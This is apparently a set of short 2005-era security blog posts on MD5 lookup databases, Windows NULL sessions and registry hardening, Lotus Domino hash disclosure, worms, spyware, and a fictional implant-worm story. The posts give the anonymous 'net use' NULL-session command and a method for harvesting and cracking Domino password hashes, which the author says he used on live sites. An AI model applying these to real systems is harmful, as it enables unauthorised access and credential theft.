An Online MD5 Hash Database

MD5 Hashes protect a verity of content types such as in the case of pass phrases, session ids, etc the logic behind it is that to compute an equivalent of MD5 of all possible plain text would be a computational nightmare.

This computational nightmare has been brought one step closer to becoming an hackers’/crackers’ best friend with the introduction of the “Online MD5 Hash Database“. The Online MD5 Hash Database does exactly as it names says, stores in excess of 12 Million different MD5 values and their corresponding plain text equivalents.

How good the engine you say? will it was able to crack this MD5 Hash in near “real-time”: 1870a829d9bc69abf500eca6f00241fe (wordpress). How did it do it? well it some user has inputted the word wordpress into its Hash database.

I did the same for the words: security (e91e6348157868de9dd8b25c81aebfb9), securiteam (1d167077e74e969b9b7d34b2d901d697) and SecuriTeam (0a6b8933fcc5ea8234d49769de76cddc).


Open Reverse Code Engineering

Reverse engineering a piece of software doesn’t sounds as something that would be compatible with the word “Open”, but in this case the OpenRCE is a community of people who want to share among researchers interested in the field of reverse engineering thoughts, tutorial, etc.


Super Villain

No this isn’t a mistake, this article is about a super villain, called Steve, and he is using Linux … and a bunch of monkeys, engineered goats and … you will need to watch the flash movie to learn more :)


Smells FISH(y)

I’m an administrator of a VPS (Virtual Private Server). A few days ago I noticed something weird on the VPS : a weird process running a Perl script, that redirects its output to the O mighty black hole: /dev/null. The prompt variable of Bash (PS1) was set to be empty and the script itself was written like a VBA code (without indentation or line breaks). When I made a quick glance at the script, I saw that one Regex inside was looking for a command such as rmdir (for example), and it will unlink a directory.

Sounds like a back door that someone wrote, and all that it needs now is to open a shell for you and get over with it …

Well NO! This script was used by KDE (in this case) for simple SSH connection, that mimics the behavior of sftp, but over a simple ssh connection. The owner of the VPS used the KDE’s way (Konqueror ?) to login into the server… and KDE installed the script for the user.
Now when the user logged in, the commands “users” and “who” will not show you the user itself (“who -a” will show something, but not who is the user or the IP of the connected user). “last” also will not give you much information about the login, and if you try to hide the process, then even “ps” will not help (I first saw that issue using ps)…
Oh btw the script also read and wrote information to and from /var/log/messages.

BTW, this script implements the FISH protocol.

How do I know that you ask? Well thats what the Perl script says :-P .
It seems that KDE (and other clients) try to help their users by implementing a sftp like actions without leaving the ssh client.

Sounds cool ? well I guess so… but then again, it IS a back door. That is if someone will be able to make the “server” talk with him without any need for authentication.

People should stop being lazy, and start using the right tool for the right job. Using FISH, can be exploited the same way that rlogin, telnet and NULL Session are .


The NULL Session Saga

NULL Session is by far the most notorious Windows vulnerability around. What NULL session basically means is that it is possible to connect to your IPC$ administrative share with no username and no password and gain some juicy data. To demonstrate this, simply run cmd and type:
net use \\host /user:"" ""

Where host is the IP/name of any machine on the network. If you get ‘The command completed successfully.’ you’re connected to a machine without providing any credentials.

NULL sessions are more than just information leakage. At least one worm has been known to spread by exploiting both NULL sessions and a vulnerability in RPC.

NULL session is so bad that SANS has been constantly including it in their SANS Top 20.

The discussion if this is a security vulnerability or a feature has been going on forever. Instead of arguing, let’s see how we can solve it for the people that actually wants it solved!

Well… It ain’t that simple… Take a deep breath, this is going to be long.

Windows NT 4.0 / Windows 2000:
The problem is known from the days of NT4. In the good ol’ days all that was needed is some spit and nails to solve the problem, or in other words:
Under: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA change the item: RestrictAnonymous from 0 to 1

Problem solved! Not exactly. This only restricts the information gained from NULL session, and does not actually block the connection. Specifically, if you set this to 1, the unauthenticated user can’t enumerate SAM accounts, but it’s still possible to learn a lot about the users on the machine and the network structure.

So, in Windows 2000 Microsoft added another level to RestrictAnonymous. If you set RestrictAnonymous to 2 you actually block ALL unauthenticated access to the IPC$ share. And peace came to the land.

Well… This is swell, if you don’t count some pesky bits of software that actually MUST access the IPC$ with no username and password. I know of at least one accounting program that was written 10 years ago, and no one actually plans to patch it. Even worse, this also blocks anonymous connections from localhost! So if a poor programmer wants to run NetGroupAddUser for example from a local program, it must be done with a username and password!

But, the security freaks were once again calm, they have no NULL session in their machines once and for all. Well, until Windows XP that is.

Windows XP / 2003:
After customer complaints that RestrictAnonymous = 2 made them work hard, Microsoft decided to make life intolerable, er, simpler. In windows XP we now have 3 different keys controlling the NULL session ‘feature’. Under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA :
1. Good old RestrictAnonymous is still there, but setting it to 1 or 2 yields the same result, NULL connections can still be created, less information leaks.
2. RestrictAnonymousSam controls anonymous access to SAM accounts (in the past that what RestrictAnonymous = 1 did).
3. EveryoneIncludesAnonymous When set to 0 (default factory setting), this little piggy prevents anonymous connections to be in the ‘Everyone’ group and access resources allowed to everyone.

So what do we get from all these changes? NULL connections can’t get SAM accounts, are not in any group, and generally are unwelcome. But! Cries the purist, they can still make an anonymous connection!
That’s right, in Windows XP, no setting allows the poor administrator to completely block those dreaded NULL connections!

So what can the poor administrator do? First thought comes to mind is of course: Use a firewall!

Disable File and Printer Sharing / Filter traffic and IPSec:
1. So why can’t we just disable all access to the IPC$, who needs it anyway?
The simplest way to solve this, is just uncheck ‘File and Printer Sharing for Microsoft Windows’ on every network interface on the machine! Yup. That works. If you don’t need shared directory, shared printers, remote registry or anything of the sort…
Not a very valid solution in many cases.

2. OK, let’s firewall the damn thing. Just block all incoming traffic on 445/139. Nice try. Microsoft puts so many services on these two poor ports that it can make your eyes bleed. Just as an example: Computer Browser, Workstation, Server, Remote Registry, File / Printer Sharing, DCOM and so on…
OK, I’ll just allow authenticated connection, reject all unauthenticated. I’m sure my firewall can do that!
Not exactly, at least not the firewall built-in 2000 / XP / 2003 (IPSec or the Windows XP Service Pack2 firewall). These guys only talk in source and target ports. No way to tell an authenticated connection from anonymous one. What now?

3. IPSec policy. You heard right, enforce Kerberos (or any equivalent) authentication on all SMB connections. Make everyone authenticate with the Active Directory server before even accessing the port!
That’s actually a very nice solution, the only problem is that it’s a bit awkward. You need an Active Directory server, have all workstations and servers authenticate via that server, and don’t forget to manage and harden your brand new Active Directory server, otherwise you’re back in square 1.
Not to mention that this kind of system takes time to build, check and finally maintain. But, this solves NULL session on XP, 2003 and probably on any new Microsoft Windows system.

Bottom Line:
If you understand the implications if NULL session in your organization, I strongly recommend you to start thinking about how to solve, or at least minimize the problem. IPSec is by far the ‘comlpete’ solution, but it requires configuration and investment in a working authentication server. In the meantime, harden the registry where possible, and enforce good network separation between subnets.


Getting Further with Lotus Domino Password Disclosure

We recently reported a Lotus Domino vulnerability: Default Configuration Information Disclosure in Lotus Domino (Including Password Hashes). This vulnerability on its surface looks pretty harmless, but a quick investigation uncovers just how dangerous this vulnerability really is.

The advisory discusses the possibility of a Lotus Domino users’ hashed passwords being retrieved by an unauthenticated/unprivileged user where the attacker simply accesses the Lotus Domino’s “Public Address Book”. This address book not only contains the list of all users with their phone number, email, pager :P , department code, room number, etc but also their password.

The password can’t be seen unless you view the source of the page and capture the value found after the HTTPPassword variable, for example <input name=”HTTPPassword” type=”hidden” value=”(…)”>. The hashed value (Rc4) can then be broken by using the patch for John the Ripper provided at and specifying to John that you are interested in breaking Lotus5 hashes.

The brute forcing mechanism is pretty quick, on an Intel Pentium 4 with a 2.80GHz CPU John will try around 150,000 c/s.

Using Google I was able to locate a few vulnerable sites, and crack their users password in a few seconds (some were very simple passwords: password – passpass – enter – default – 123456), demonstrating that this vulnerability is a very serious one.


Zotob.A Exploits PnP Vulnerability

A new worm has been found in the wild – Zotob.A. This new worm exploits a recently published Microsoft vulnerability. The vulnerability involves exploiting Windows’ PnP service.

This new worm is quite interesting as Microsoft released MS05-039 on August 9, 2005, an exploit for this vulnerability was released 3 days afterwards on August 12, 2005 and now a worm has been set loose, all in less than 5 days.

I think this is a new record for the “vulnerability -> patch -> exploit -> worm” cycle.

Time will tell how widespread this worm will be, you can learn more on this worm in the following post: Zotob.A.


Social Engineering the Dilbert Way

The following illustrates how Dilbert’s Dogbert uses social engineering to get Pointy Boss to give him his social security number and password :) :


Is that an OS X in your PC or are you just happy to see me?

In my previous post I discussed how Apple has placed a TPM device in their computer to try and make it difficult to install their Tiger operating system on “normal” (i.e. non-Apple) Intel based computer. It appears that Justin Nolan has been able to get around this and has placed a HOW-TO guide in the following URL:, hooray for him :) , in any case, you can probably save yourself the time and buy (or get a free) mini-Mac bundled with Tiger (Mac OS X).


Hidden Problems

I recently encountered a company that requested to be scanned for known vulnerabilities and requested a report about the status of their servers. The company protected their servers with IPS, that blocks connections from anyone that attempts to perform port scans etc… So the port scan failed, our scanning server was blocked, and the company was very happy that their IPS was able to block the scan. They received a report that said their servers were ‘black holes’. They were unhappy with the report, and wanted a confirmation that their servers are not vulnerable.

I do not like this type of arrogance by people. They think they’re smart, and then some script kiddie comes and tries for his first time some exploit, and breaks into their system without breaking a sweat.

This arrogance comes from IT personnel that regard IDS and IPS as really cool tools, as they can use them to show their bosses “look Mr. Boss no one can penetrate us, as we are blocking any attempt to scan us.”. Mr. Boss would then conclude and say: “cool, so we are now ‘hacker free’”

Well here most people will say to themselves YES! but that is not the case people !!!

IDS/IPS are only one gate to be passed. Sometimes it’s easier to use an HTTP, SMTP, WHATEVER most used open services and penetrate using these services…

Most of the people that are reading these words, probably know how to do it, by using known vulnerabilities in the services the company is using.

But how can someone know what is the exact service that this company uses ? amm lets see. Lets post an email to a company, and ask them for more information about their product. We are doing so, to see an email signature of a server/client/path/feel in the missing field. Oh wait, that was too hard, lets see the web page of the company. OK It’s ASP. Lets look at a 404 page… Yeap it have a different strings inside every version … So I know what to exploit for each version …

Another way to know it, is by using Javascript that will return to me a list of system variables from the server… Some variables exists only for specific servers. And that’s just two very short examples…

So you see Mr. Boss ? I can’t port scan you, and some other type of “brute force” actions, but I can gather information, and even exploit your system with their known vulnerabilities (or zero day ones). You are not protected by IDS/IPS, only put the dirt under the rug.

IDS/IPS are as good as the rest of your services security, and they can help with preventing attacks, but only when everything else works well.

Or in less harsh words, don’t hide the problems, solve them instead.


From ATM Cameras to “Mouse Cameras”

You have probably heard of thieves placing small cameras above the ATM’s keyboard to capture the user’s keystrokes – PIN number. This idea has been borrowed by at least one Trojan/Spyware I am aware of – Dumaru.

As explained in the following paper: HOW DUMARU?, one of the “features” this Trojan/Spyware has is the ability to capture a picture of the vicinity of the mouse pointer whenever the mouse button is pressed.

This picture is then transmitted to the proprietors of the Trojan/Spyware. As capturing all mouse click events would be too expensive, the Trojan/Spyware focuses on two web pages: C:\DATA\SRK.HTA (The local copy of the logon page to e-Gold) and – Microsoft Internet Explorer.


I didn’t do it, my MD5 was Tampered

You already know that MD5 was found to be vulnerable to collision, i.e. you can create the same MD5 value from two different types of plain texts.

What most people expected next is to see the security implications, such as PKI systems getting “broken”, credit card fraud rising, etc. What they didn’t expect is this: Motorist wins case after maths whizzes break speed camera code.

To summarize the article, the cracking of the MD5 algorithm by the Chinese group, saved this guy from getting a ticket as the police couldn’t state that the MD5 used to “store” (yes they say store) the time, date, place, numberplate and speed of cars wasn’t tampered with.

Oh common :D . The judge doesn’t look at the value 69f034b96312b3d012b37cd26ee8680d and says… yeah I see he has been speeding :) . The value is used to confirm authenticity for the parameters of the ticket, i.e. time, date, etc. For someone to both crack the MD5 value and put the right values in the database would be more than an amazing feat, it will be practically impossible.

The Chinese group didn’t provide a cracking-mechanism for tempering with MD5, rather they said that if you have a “free” plain text, such in the case where the plain text is a postscript file that can contain rudimentary binary data that wouldn’t be visible to the end user, I can make the plain text appear to be genuine by adding “junk” binary data to compensate for change in such a way that the MD5 value will stay the same.

So in this case, I don’t have the privilege of putting rudimentary data, so I can’t temper with the plain text enough to generate the same MD5 value.

To conclude the police lost because they: failed to find an expert to testify that its speed camera images were secure, or to say it plain words, because they are stupid.


WordPress Command Execution Vulnerability

Yet again a command execution vulnerability has been found in WordPress, the command execution vulnerability will affect any WordPress that resides on a web server whose PHP settings indict that: register_globals = On.

Why do sites still have this set to On, I don’t know. We also had it set to On just until a few hours ago… :P .

In any case the best method to stop yourself from being hacked is to set the register_globals to off.

You can find an exploit that you can use to test your system at:


Linux Passes the WGA Test

According to Linux with Wine passes Microsoft’s WGA without a hitch, does this mean that Microsoft has a soft spot for Linux? – I can’t believe that :)


Nisco – Connecting people

Nisco was born of two market leaders joining forces. Nokia, the world renowned cellular phone developer and Cisco, the company whose products serve as the Internet’s infrastructure. The aim of Nisco was to connect people in a very similar way to the way computers and other devices have connected into one huge network.

Tele-people device – a device that connects (similarly to phones) a person to a network of other people, made communication between two people instantaneous and seamless. All you needed to do in order to reach someone was to think about them. From that moment any thought that crossed his or her mind would cross yours and vice verse. This brought the community closer to together, and brought a whole new type of entertainment, created new relationships, and changed the meaning of meeting people.

However, as with any other form of new technology, trouble didn’t lag behind. The technology came out roughly seven years ago to this date. When it came out, there was a lot of debate on whether it was or wasn’t dangerous to link people’s minds directly to technology. In the first year of its appearance, the technology was thoroughly tested, and no problems have been found with it. Once the FCC and FDA have granted their approval, people started implanting the device, which in turn generated additional word of mouth – resulting in additional people getting the implants.

It took nearly three years before someone was able to use the technology to harm the consumers. At first, the perpetrator tried to warn people – but was quickly silenced by Nisco’s attorneys and investigated by the FBI on the count of endangering national security. Unfortunately for Nisco, the information on how this harm can be done has quickly spread throughout the network, making anyone with a bit of intelligence capable of modifying his implement to do more than just connect with other people.

What happened next was totally unexpected. The first worm-like modification to the implant was released into the network, infecting millions of people, and placing their device in a constant state of broadcast. This sent their thoughts, feelings, visions, and basically anything that crossed their minds, into the public domain. As this worm continued to modify people, more and more broadcasts of people began to clutter the network, making infected people unable to function, as they were constantly and simultaneously receiving feeds from thousands of sources.

Matters quickly deteriorated, as the first cases of total mental breakdown were reported. A quarter of a million people were no longer functioning – unable to work, eat, or sleep they simply withered and died. In addition, the number of people infected slowly but surely reached the staggering billions, and Nisco stood by and couldn’t believe that something like this could be happening to them. The government of course was quick to react with an investigation, but it was already too late for the people that have got themselves implanted with the Nisco technology. On the one hand, since there was no way of disconnecting them from the network without causing them harm, there was no sure way of protecting them from the spreading worm.

As millions died the court system made hacking (either software or hardware), as illegal as murder, eventually making the death sentence mandatory for such crimes. Unfortunately for the person that released the worm and for the rest of the world, he got infected as well, squashing any prospect that a solution might be found.

The number of new people getting connected to the network dropped to zero. People connected to the network continued to die due to the effects of the worm, and many also decided to take the path of suicide by getting their implants removed. As the number of connected people diminished, so did the number of infections, and eventually the worm was unable to find new candidates for infections and disappeared.

The world remained devastated. Technologies that allowed you to integrate people with machines were rendered illegal and not even rebellious countries like China allowed their researchers to preform academic research in the field. Nisco was taken to court, were it lost and had to pay compensation to millions of people left with their love ones mentally handicapped or all alone as their spouses, children, brothers or sisters died as a result of this complete mental breakdown. These compensations brought Nisco to its knees and the company filled for bankruptcy, which was only thing they could do now that consumers no longer wanted to buy anything related to or manufactured by the once considered giant of the industry, Nisco.

So came to an end the merger between the two market leaders, Cisco and Nokia. People still remember the famous press release that Cisco and Nokia released when they merged – people’s lives will change forever – how right they were and how wrong were we to disregard their statement as just a marketing scheme.


Drive-by spyware which, well, spies on you

CoolWebSearch (CWS) is an interesting advertising company. What sets it apart from your run-of-the-mill advertising company is that it specifically uses browser vulnerabilities (mainly Internet Explorer) to install its spyware/adware as the user browses one of its numerous affiliate sites. No user interaction whatsoever. This type of activity has been dubbed in the industry as ‘drive-by installation’.

It appears that an invisible boundary has been crossed now with a CWS variant that specifically collects keyboard strokes and potentially other information and posts it on an Internet server.

Check out Sunbelt Software blog and remember: This is just a blog and the alleged research results of a single person. Don’t jump to conclusions – not just yet.

Correction: CoolWebSearch probably has nothing to do with that; The trojan was found during a CWS investigation by a researcher, but it is not otherwise related to CoolWebSearch.